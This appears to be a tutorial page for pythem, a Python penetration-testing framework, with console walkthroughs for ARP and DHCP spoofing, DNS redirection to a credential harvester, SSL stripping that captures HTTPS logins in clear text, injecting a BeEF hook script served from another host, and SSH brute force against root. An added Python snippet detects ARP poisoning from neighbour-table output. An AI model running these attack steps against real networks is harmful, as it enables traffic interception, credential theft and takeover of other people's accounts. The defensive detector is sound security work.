
Pythem is a multi-purpose pentest framework written in Python. It has been developed to be used by security researchers and security professionals. The tool is intended to be used only for acts within the law.
Features –
- Only runs on GNU/Linux OS.
- Based on Python
- Easy to install and use
Supported attacks –
- ARP spoofing – Man-in-the-middle (MITM).
- Man-in-the-middle HSTS bypass – Strip SSL
- ARP+DNS spoof – fake page redirect to credential harvester
- DHCP ACK Injection spoofing – Man-in-the-middle
- Man-in-the-middle inject BeEF hook
- SSH Brute-Force attack.
- Web page formulary brute-force
- URL content buster
- Overthrow the DNS of LAN range/IP address
- Redirect all possible DNS queries to host
This tool is especially useful for DoS and MITM attacks over a LAN. You can easily define the target, gateway, interface, etc.
Installation of Pythem –
Installation can be done via git clone by typing this command:
Command: git clone https://github.com/m4n3dw0lf/pythem
Before running it, we have to give full permissions to the install executable file, because we need to install some dependencies, which you can find in the requirements.txt file.
For permissions, the command is “chmod +x install”.
After the installation completes, just type “pythem” in your terminal.
To view all commands and information about pythem, just type help in the same terminal.
ARP spoofing – Man-in-the-middle
pythem> set interface eth0
pythem> set gateway 192.168.179.2
pythem> arpspoof start
pythem> sniff
[+] Enter the filter: core
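From the defender's side, the poisoning started by "arpspoof start" shows up in a host's neighbour table: the gateway IP resolves to a MAC address that also answers for another host, or that differs from the gateway's known MAC. The Python check below is an added example, not part of pythem or of the original page; the sample "ip neigh show" output, the MAC addresses and the function names are constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed sample of `ip neigh show` output from a host whose gateway entry
# is being poisoned. IPs reuse the page's lab range; all MACs are made up.
SAMPLE_NEIGH = """\
192.168.179.2 dev eth0 lladdr 00:0c:29:5e:11:a7 REACHABLE
192.168.179.145 dev eth0 lladdr 00:0c:29:5e:11:a7 STALE
192.168.179.1 dev eth0 lladdr 00:50:56:c0:00:08 REACHABLE
192.168.179.77 dev eth0  FAILED
fe80::250:56ff:fec0:8 dev eth0 lladdr 00:50:56:c0:00:08 router STALE
"""

LINE_RE = re.compile(
    r"^(?P<ip>\S+) dev (?P<dev>\S+) lladdr (?P<mac>[0-9a-fA-F:]{17})\b")


def parse_neigh(text):
    """Return {(dev, mac): set of IPv4 addresses} for resolved entries."""
    table = defaultdict(set)
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        # Skip unresolved rows (no lladdr) and IPv6 rows, which legitimately
        # share a MAC with the same host's IPv4 address.
        if not m or ":" in m["ip"]:
            continue
        table[(m["dev"], m["mac"].lower())].add(m["ip"])
    return table


def find_arp_anomalies(text, gateway_ip, pinned_gateway_mac=None):
    """Flag the neighbour-table symptoms of ARP cache poisoning."""
    findings = []
    for (dev, mac), ips in sorted(parse_neigh(text).items()):
        if gateway_ip not in ips:
            continue
        if len(ips) > 1:  # gateway MAC also claimed by another IP
            others = sorted(ips - {gateway_ip})
            findings.append(("duplicate-mac", dev, mac, others))
        if pinned_gateway_mac and mac != pinned_gateway_mac.lower():
            findings.append(("gateway-mac-changed", dev, mac, [gateway_ip]))
    return findings


if __name__ == "__main__":
    # The pinned MAC is a constructed "known good" value for the gateway.
    for f in find_arp_anomalies(SAMPLE_NEIGH, "192.168.179.2", "00:50:56:F4:2B:9C"):
        print(f)
```

A router that legitimately holds several IPv4 addresses on one interface will trigger the duplicate-mac finding, so the pinned-MAC comparison is the stronger of the two signals.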
ARP+DNS spoof – fake page redirect to credential harvester
pythem> set target 192.168.179.142
pythem> set interface eth0
pythem> set gateway 192.168.179.2
pythem> arpspoof start
[+] Setting the packet forwarding.
[+] Iptables redefined.
[+] ARP spoofing initialized.
pythem> dnsspoof start
[!] Type all to spoof all domains
[+] Domain to be spoofed: example.com
[+] Default address to redirect is:192.168.0.6 do you want to change?[y/n]n
[+] DNS spoofing initialized.
pythem> sniff core
Man-in-the-middle DHCP spoofing – DHCP ACK Injection
pythem> dhcpspoof start
[+] DHCP Server IP address: 192.168.1.1
[+] Broadcast address: 192.168.1.255
[+] Subnet mask: 255.255.255.0
[+] Router IP address: 192.168.1.1
[+] Domain: home
[+] DNS Server IP address: 192.168.1.4 (fake)
[+] DHCP spoofing initialized.
pythem> sniff core
Man-in-the-middle HSTS bypass – Strip SSL
pythem> set interface eth0
pythem> set gateway 192.168.179.2
pythem> set target 192.168.179.142
pythem> hstsbypass
pythem> sniff core
As soon as someone on the target machine logs in to gmail.com or any other HTTPS-based site, it will sniff the login credentials in clear text.
Man-in-the-middle inject BeEF hook
Start the BeEF XSS framework and get the hook script URL.
pythem> set interface eth0
pythem> set target 192.168.179.142
pythem> set gateway 192.168.179.2
pythem> arpspoof start
[*] Iptables redefined
[*] Setting the packet forwarding.
[+] ARP spoofing initialized.
pythem> redirect start
[+] Enter the script source: http://192.168.179.145:3000/hook.js
[+] Redirect with script injection initialized.
[+] Injection URL – http://192.168.179.145:80
[+] Target was requesting: waccounts.google.com
[+] Script Injected on: ('192.168.179.1', 27813)
SSH Brute-Force attack
pythem> service ssh start
pythem> set target
[+] Enter the target(s): 127.0.0.1
pythem> set file wordlist.txt
pythem> brute ssh
[+] Enter the username to bruteforce: root